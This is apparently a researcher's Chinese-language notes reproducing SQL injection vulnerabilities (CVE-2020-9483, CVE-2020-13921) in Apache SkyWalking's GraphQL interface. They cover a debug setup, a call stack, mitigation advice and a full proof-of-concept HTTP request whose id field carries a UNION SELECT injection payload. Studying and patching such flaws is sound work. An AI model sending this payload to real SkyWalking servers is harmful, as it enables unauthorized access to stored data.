参考:
- https://www.openwall.com/lists/oss-security/2020/06/15/1
- https://mp.weixin.qq.com/s/91MWSDYkom2Z8EVYSY37Qw
- http://www.h2database.com/html/functions.html#h2version
- https://s.tencent.com/research/bsafe/1011.html
- https://blog.csdn.net/smooth00/article/details/96479544
编译好的6.5.0版本:
wget https://archive.apache.org/dist/skywalking/6.5.0/apache-skywalking-apm-6.5.0.tar.gz
wget https://archive.apache.org/dist/skywalking/8.3.0/apache-skywalking-apm-8.3.0.tar.gz
cd apache-skywalking-apm-bin/bin
vi oapService.sh
相关源码:
https://archive.apache.org/dist/skywalking/8.3.0/apache-skywalking-apm-8.3.0-src.tgz
源码编译方式参考:
https://github.com/apache/skywalking/blob/master/docs/en/guides/How-to-build.md
加上调试参数:
DEBUG_OPTIONS="-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=12346"
然后启动:
./startup.sh
可以看出来是分两部分启动的,OAP和Web Application。
发现已经在监听12346端口了。
下载6.5.0源码 (https://www.apache.org/dyn/closer.cgi/skywalking/6.5.0/apache-skywalking -apm-6.5.0-src.tgz)
导入IDEA,添加Remote Configuration,并设置module classpath为oap-server。
漏洞描述:
When use H2/MySQL/TiDB as Apache SkyWalking storage, the
metadata query through GraphQL protocol, there is a SQL injection
vulnerability,
which allows to access unpexcted data. Apache SkyWalking
6.0.0 to 6.6.0, 7.0.0 H2/MySQL/TiDB storage implementations don’t use the
appropriate way to set SQL parameters.
影响版本:
6.0.0-6.6.0, 7.0.0
我改成tcp形式才成功,默认的h2是内存型的,没找到表,导致失败了。 编辑application.yml
:
通过调试可以发现对id参数进行了拼接:
于是对id参数构造payload:
id: \"') UNION SELECT 1,CONCAT('~', H2VERSION(), '~')--\"
由于where查询语句已经结束,可以使用union注入,最后使用--
注释掉后面的内容。
Demo:
调用栈:
executeQuery:106, JDBCHikariCPClient (org.apache.skywalking.oap.server.library.client.jdbc.hikaricp)
getLinearIntValues:117, H2MetricsQueryDAO (org.apache.skywalking.oap.server.storage.plugin.jdbc.h2.dao)
getLinearIntValues:96, MetricQueryService (org.apache.skywalking.oap.server.core.query)
getLinearIntValues:60, MetricQuery (org.apache.skywalking.oap.query.graphql.resolver)
invoke:-1, MetricQueryMethodAccess (org.apache.skywalking.oap.query.graphql.resolver)
get:147, MethodFieldResolverDataFetcher (com.coxautodev.graphql.tools)
fetchField:227, ExecutionStrategy (graphql.execution)
resolveField:170, ExecutionStrategy (graphql.execution)
execute:59, AsyncExecutionStrategy (graphql.execution)
executeOperation:158, Execution (graphql.execution)
execute:100, Execution (graphql.execution)
execute:558, GraphQL (graphql)
parseValidateAndExecute:500, GraphQL (graphql)
executeAsync:470, GraphQL (graphql)
execute:401, GraphQL (graphql)
execute:87, GraphQLQueryHandler (org.apache.skywalking.oap.query.graphql)
doPost:81, GraphQLQueryHandler (org.apache.skywalking.oap.query.graphql)
doPost:54, JettyJsonHandler (org.apache.skywalking.oap.server.library.server.jetty)
service:707, HttpServlet (javax.servlet.http)
service:101, JettyJsonHandler (org.apache.skywalking.oap.server.library.server.jetty)
service:790, HttpServlet (javax.servlet.http)
service:105, JettyJsonHandler (org.apache.skywalking.oap.server.library.server.jetty)
handle:841, ServletHolder (org.eclipse.jetty.servlet)
doHandle:543, ServletHandler (org.eclipse.jetty.servlet)
nextHandle:188, ScopedHandler (org.eclipse.jetty.server.handler)
doHandle:1239, ContextHandler (org.eclipse.jetty.server.handler)
nextScope:168, ScopedHandler (org.eclipse.jetty.server.handler)
doScope:481, ServletHandler (org.eclipse.jetty.servlet)
nextScope:166, ScopedHandler (org.eclipse.jetty.server.handler)
doScope:1141, ContextHandler (org.eclipse.jetty.server.handler)
handle:141, ScopedHandler (org.eclipse.jetty.server.handler)
handle:132, HandlerWrapper (org.eclipse.jetty.server.handler)
handle:564, Server (org.eclipse.jetty.server)
handle:320, HttpChannel (org.eclipse.jetty.server)
onFillable:251, HttpConnection (org.eclipse.jetty.server)
succeeded:279, AbstractConnection$ReadCallback (org.eclipse.jetty.io)
fillable:110, FillInterest (org.eclipse.jetty.io)
run:124, ChannelEndPoint$2 (org.eclipse.jetty.io)
runJob:672, QueuedThreadPool (org.eclipse.jetty.util.thread)
run:590, QueuedThreadPool$2 (org.eclipse.jetty.util.thread)
run:748, Thread (java.lang)
poc:
POST /graphql HTTP/1.1
Host: cqq.com:8080
Content-Type: application/json;charset=utf-8
Content-Length: 313
Connection: close
{"query":"query queryData($duration: Duration!) {globalP99: getLinearIntValues(metric: {name: \"all_p99\", id: \"') UNION ALL SELECT NULL,CONCAT('~', H2VERSION(), '~')--\" }, duration: $duration) { values { value } }}","variables":{"duration":{"start":"2020-08-07 1417","end":"2020-08-07 1418","step":"MINUTE"}}}
修复建议:
升级Apache SkyWalking至8.0版,升级链接:https://github.com/apache/skywalking/releases
如暂时无法升级,作为缓解措施,建议不要将Apache SkyWalking的GraphQL接口暴露在外网,或在GraphQL接口之上增加一层认证。
CVE-2020-13921
Only when using H2/MySQL/TiDB as Apache
SkyWalking storage, there is a SQL injection vulnerability in the wildcard
query cases.
参考:
https://lists.apache.org/thread.html/r6f3a934ebc54585d8468151a494c1919dc1ee2cccaf237ec434dbbd6@%3Cdev.skywalking.apache.org%3E
去这里找文件接口:
oap-server\server-query-plugin\query-graphql-plugin\src\main\resources\query-protocol
杂
安装了多个版本总碰到这个异常:
logs$ vi webapp.log
具体:
com.netflix.zuul.exception.ZuulException: Forwarding error
at org.springframework.cloud.netflix.zuul.filters.route.RibbonRoutingFilter.handleException(RibbonRoutingFilter.java:189)
at org.springframework.cloud.netflix.zuul.filters.route.RibbonRoutingFilter.forward(RibbonRoutingFilter.java:164)
at org.springframework.cloud.netflix.zuul.filters.route.RibbonRoutingFilter.run(RibbonRoutingFilter.java:111)
at com.netflix.zuul.ZuulFilter.runFilter(ZuulFilter.java:112)
at com.netflix.zuul.FilterProcessor.processZuulFilter(FilterProcessor.java:193)
at com.netflix.zuul.FilterProcessor.runFilters(FilterProcessor.java:157)
at com.netflix.zuul.FilterProcessor.route(FilterProcessor.java:118)
at com.netflix.zuul.ZuulRunner.route(ZuulRunner.java:96)
at com.netflix.zuul.http.ZuulServlet.route(ZuulServlet.java:116)
at com.netflix.zuul.http.ZuulServlet.service(ZuulServlet.java:81)
解决方法:修改webapp/webapp.yml
:(开始ReadTimeout只有10000)
server:
port: 8080
collector:
path: /graphql
ribbon:
ReadTimeout: 600000
# Point to all backend's restHost:restPort, split by ,
listOfServers: 127.0.0.1:12800
参考:
- https://blog.csdn.net/weixin_39220472/article/details/89431528
GraphQL背景知识
参考:
新添加功能时,将接口声明写在.graphqls
文件中,
比如SkyWalking中:
org\apache\skywalking\oap\query\graphql\GraphQLQueryProvider#prepare
.file("query-protocol/log.graphqls")
.resolvers(new LogQuery(getManager()))
h2数据库测试
在mavan里找
直接运行:
java -jar C:\Users\Administrator\.m2\repository\com\h2database\h2\1.4.196\h2-1.4.196.jar
即可自动打开web console界面进行测试。